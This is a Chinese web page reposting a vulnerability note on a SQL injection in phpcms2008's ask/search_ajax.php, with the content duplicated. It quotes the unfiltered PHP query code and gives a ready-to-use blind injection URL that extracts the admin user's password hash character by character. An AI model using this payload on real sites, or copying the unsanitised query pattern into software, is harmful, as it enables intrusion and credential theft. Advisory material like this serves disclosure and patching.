您现在的位置是:网站首页> 编程资料编程资料
phpcms2008 注入漏洞_漏洞分析_网络安全_
2023-05-24
319人已围观
简介 phpcms2008 注入漏洞_漏洞分析_网络安全_
这个是最新有人发现的
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
相关内容
- 校内网最新 xss Cookies得到密码_漏洞分析_网络安全_
- 微软IIS6漏洞:服务器敏感信息易被窃_漏洞分析_网络安全_
- Gh0st控制端逻辑漏洞_漏洞分析_网络安全_
- WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞_漏洞分析_网络安全_
- 恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞_漏洞分析_网络安全_
- cyask知道系统collect.php页面存在越权漏洞_漏洞分析_网络安全_
- Discuz X1.5 用不到 Gmail SSL SMTP_漏洞分析_网络安全_
- xyxcms v1.3 小游戏CMS 漏洞说明_漏洞分析_网络安全_
- Zblog最新跨站漏洞及利用代码_漏洞分析_网络安全_
- 金山毒霸多个sql注入及XSS漏洞和修复_漏洞分析_网络安全_
